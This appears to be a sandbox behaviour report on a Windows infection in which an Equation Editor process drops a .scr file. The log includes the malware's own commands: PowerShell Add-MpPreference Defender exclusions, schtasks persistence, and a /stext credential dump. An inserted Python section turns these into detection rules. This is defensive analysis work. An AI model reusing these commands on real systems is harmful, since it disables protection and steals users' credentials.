                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Memory allocated: 2690000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Memory allocated: 3D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Memory allocated: 5660000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Memory allocated: 51E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Memory allocated: 6660000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Memory allocated: 5310000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 21_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 21_2_0040DD85
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 25_2_0041A748
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2692
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2641
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2762
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2699
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Window / User API: threadDelayed 9327
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Window / User API: foregroundWindowGot 1624
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2075
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3211
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2470
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2905
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe API coverage: 7.2 %
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3260 Thread sleep time: -240000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr TID: 3612 Thread sleep time: -60000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr TID: 3416 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3536 Thread sleep count: 2692 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3528 Thread sleep count: 2641 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3688 Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3696 Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3508 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3700 Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3716 Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3624 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr TID: 3744 Thread sleep count: 225 > 30
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr TID: 3744 Thread sleep time: -112500s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr TID: 3748 Thread sleep count: 171 > 30
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr TID: 3748 Thread sleep time: -513000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr TID: 3824 Thread sleep time: -120000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr TID: 3748 Thread sleep count: 9327 > 30
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr TID: 3748 Thread sleep time: -27981000s >= -30000s
                  Source: C:\Windows\System32\taskeng.exe TID: 3900 Thread sleep time: -120000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe TID: 2168 Thread sleep time: -60000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe TID: 3920 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2652 Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2520 Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3996 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1396 Thread sleep count: 2470 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1396 Thread sleep count: 2905 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3356 Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3276 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4092 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2496 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr TID: 2180 Thread sleep time: -120000s >= -30000s
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3300 Thread sleep time: -120000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 12_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 12_2_100010F1
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 12_2_10006580 FindFirstFileExA, 12_2_10006580
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 21_2_0040AE51 FindFirstFileW,FindNextFileW, 21_2_0040AE51
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 22_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 22_2_00407EF8
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 23_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 23_2_00407898
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Code function: 25_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 25_2_00409253
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Code function: 25_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 25_2_0041C291
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Code function: 25_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 25_2_0040C34D
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Code function: 25_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 25_2_00409665
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Code function: 25_2_0044E879 FindFirstFileExA, 25_2_0044E879
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Code function: 25_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 25_2_0040880C
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Code function: 25_2_0040783C FindFirstFileW,FindNextFileW, 25_2_0040783C
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Code function: 25_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW, 25_2_00419AF5
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Code function: 25_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 25_2_0040BB30
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Code function: 25_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 25_2_0040BD37
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Code function: 25_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 25_2_00407C97
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 21_2_00418981 memset,GetSystemInfo, 21_2_00418981
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr File opened: C:\Windows\SysWOW64\config\systemprofile\
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr API call chain: ExitProcess graph end node graph_22-34268
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Process information queried: ProcessInformation
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 12_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_100060E2
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 21_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 21_2_0040DD85
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 21_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 21_2_004044A4
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 12_2_10004AB4 mov eax, dword ptr fs:[00000030h] 12_2_10004AB4
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Code function: 25_2_004432B5 mov eax, dword ptr fs:[00000030h] 25_2_004432B5
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 12_2_1000724E GetProcessHeap, 12_2_1000724E
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Process token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Process token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 12_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_100060E2
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 12_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_10002639
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 12_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_10002B1C
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_00434B47 SetUnhandledExceptionFilter,25_2_00434B47
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_004349F9
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_0043BB22
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,25_2_00434FDC
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr"
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr"
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Memory written: C:\Users\user\AppData\Roaming\plugman23456.scr base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Memory written: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Section loaded: NULL target: C:\Users\user\AppData\Roaming\plugman23456.scr protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Section loaded: NULL target: C:\Users\user\AppData\Roaming\plugman23456.scr protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Section loaded: NULL target: C:\Users\user\AppData\Roaming\plugman23456.scr protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_004120F7 GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_00419627 mouse_event
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\plugman23456.scr "C:\Users\user\AppData\Roaming\plugman23456.scr"
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr"
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp"
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Process created: C:\Users\user\AppData\Roaming\plugman23456.scr "C:\Users\user\AppData\Roaming\plugman23456.scr"
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Process created: C:\Users\user\AppData\Roaming\plugman23456.scr C:\Users\user\AppData\Roaming\plugman23456.scr /stext "C:\Users\user\AppData\Local\Temp\bhyzucyduxfccvbqstsgmdbbressguvzg"
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Process created: C:\Users\user\AppData\Roaming\plugman23456.scr C:\Users\user\AppData\Roaming\plugman23456.scr /stext "C:\Users\user\AppData\Local\Temp\ejlrnu"
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Process created: C:\Users\user\AppData\Roaming\plugman23456.scr C:\Users\user\AppData\Roaming\plugman23456.scr /stext "C:\Users\user\AppData\Local\Temp\odrcnntyd"
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe C:\Users\user\AppData\Roaming\znlzneAxBVd.exe
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpE15.tmp"
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Process created: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
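The process chain listed in this section (Equation Editor launching a .scr dropped under %AppData%, that process adding Defender exclusions for itself and for its copy, registering a scheduled task from an XML staged in %TEMP%, re-launching itself with /stext, and the task engine later starting the copy) is what a detection engineer wants as rules rather than as a listing. The following is an added example, not Joe Sandbox's code and not the sample's: it runs Sysmon-style process-creation records through a handful of rules modelled on the command lines above and rolls the hits up into one verdict. The record field names (Image, ParentImage, CommandLine), the process IDs on the constructed records, the task-host parent list and the two benign rows are assumptions; the malicious command lines are taken from this report.

```python
"""Detect the delivery chain above from Sysmon-style process-creation (Event ID 1)
records.  Added example, not Joe Sandbox code.  Only Image / ParentImage /
CommandLine are used; the records at the bottom are constructed from the command
lines in this report, plus two benign rows for contrast."""
import re

# Locations a standard user can write to.  A binary here that Office launched,
# or that gets a Defender exclusion, deserves a look.
USER_WRITABLE = re.compile(r"\\(AppData|ProgramData|Users\\Public|Windows\\Temp)\\", re.I)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
TASK_HOSTS = {"taskeng.exe", "svchost.exe"}  # Win7: taskeng.exe; Win10+: svchost.exe -s Schedule
EXCLUSION = re.compile(r'Add-MpPreference\s+-Exclusion\w+\s+(?:"([^"]*)"|(\S+))', re.I)
TASK_XML = re.compile(r'/XML\s+(?:"([^"]*)"|(\S+))', re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(ev):
    """Return the names of every rule the record trips (empty list if none)."""
    img, parent, cmd = ev["Image"], ev["ParentImage"], ev["CommandLine"]
    hits = []
    if basename(parent) in OFFICE_PARENTS and USER_WRITABLE.search(img):
        hits.append("office_child_from_user_dir")        # EQNEDT32.EXE -> plugman23456.scr
    if img.lower().endswith(".scr") and USER_WRITABLE.search(img):
        hits.append("screensaver_in_user_dir")          # .scr is a plain PE; the extension is camouflage
    if basename(img) == "powershell.exe":
        m = EXCLUSION.search(cmd)
        if m and USER_WRITABLE.search(m.group(1) or m.group(2)):
            hits.append("defender_exclusion_user_dir")  # Add-MpPreference -ExclusionPath %AppData%\...
    if basename(img) == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
        m = TASK_XML.search(cmd)
        if m and re.search(r"\\Temp\\", m.group(1) or m.group(2), re.I):
            hits.append("schtasks_xml_from_temp")       # task definition staged in %TEMP%
    if img.lower() == parent.lower() and re.search(r"\s/stext\s", cmd, re.I):
        hits.append("self_spawn_stext")                 # the /stext re-launch: credentials dumped to a text file
    if basename(parent) in TASK_HOSTS and USER_WRITABLE.search(img):
        hits.append("task_launches_user_dir_binary")    # persistence firing: taskeng.exe -> znlzneAxBVd.exe
    return hits


def triage(events):
    """Collapse per-record hits into one verdict for the host."""
    rules = {r for ev in events for r in evaluate(ev)}
    severity = "high" if len(rules) >= 3 else "medium" if rules else "none"
    return {"severity": severity, "rules": sorted(rules)}


def rec(pid, parent, image, cmd):
    return {"ProcessId": pid, "ParentImage": parent, "Image": image, "CommandLine": cmd}


SCR = r"C:\Users\user\AppData\Roaming\plugman23456.scr"
EXE = r"C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
# The parent is 32-bit, so the System32 path in the command line is WOW64-redirected to SysWOW64.
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
PS_CMD = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "%s"'

EVENTS = [  # constructed records; command lines from this report, PIDs assumed
    rec(3396, r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE", SCR, '"%s"' % SCR),
    rec(3500, SCR, PS, PS_CMD % SCR),
    rec(3520, SCR, PS, PS_CMD % EXE),
    rec(3540, SCR, r"C:\Windows\SysWOW64\schtasks.exe",
        r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp"'),
    rec(3704, SCR, SCR, SCR + r' /stext "C:\Users\user\AppData\Local\Temp\ejlrnu"'),
    rec(3252, r"C:\Windows\System32\taskeng.exe", EXE, EXE),
    # constructed benign rows: a normal child process, and an admin excluding a vendor directory
    rec(4100, r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    rec(4200, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r'powershell.exe Add-MpPreference -ExclusionPath "C:\Program Files\Microsoft SQL Server"'),
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["ProcessId"], basename(ev["Image"]), evaluate(ev))
    print(triage(EVENTS))
```

The exclusion rule keys on where the excluded path points, not on Add-MpPreference itself, so the admin row stays quiet while the two user-profile exclusions fire; in practice the exclusion, the task and the /stext re-launch all come from the same parent within seconds, and correlating on ParentImage rather than alerting per record keeps the volume down.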
Source: plugman23456.scr, 0000000C.00000002.885917708.00000000006F4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
Source: logs.dat.12.dr | Binary or memory string: [Program Manager]
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Code function: 12_2_10002933 cpuid
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_00452036 EnumSystemLocalesW
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_004520C3 GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_00452313 GetLocaleInfoW
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_00448404 EnumSystemLocalesW
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_0045243C GetLocaleInfoW,GetLocaleInfoW,GetACP
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_00452543 GetLocaleInfoW
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_00452610 GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_0040F8D1 GetLocaleInfoA
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_004488ED GetLocaleInfoW
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_00451CD8 IsValidCodePage,GetLocaleInfoW
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_00451F50 EnumSystemLocalesW
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_00451F9B EnumSystemLocalesW
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Queries volume information: C:\Users\user\AppData\Roaming\plugman23456.scr VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
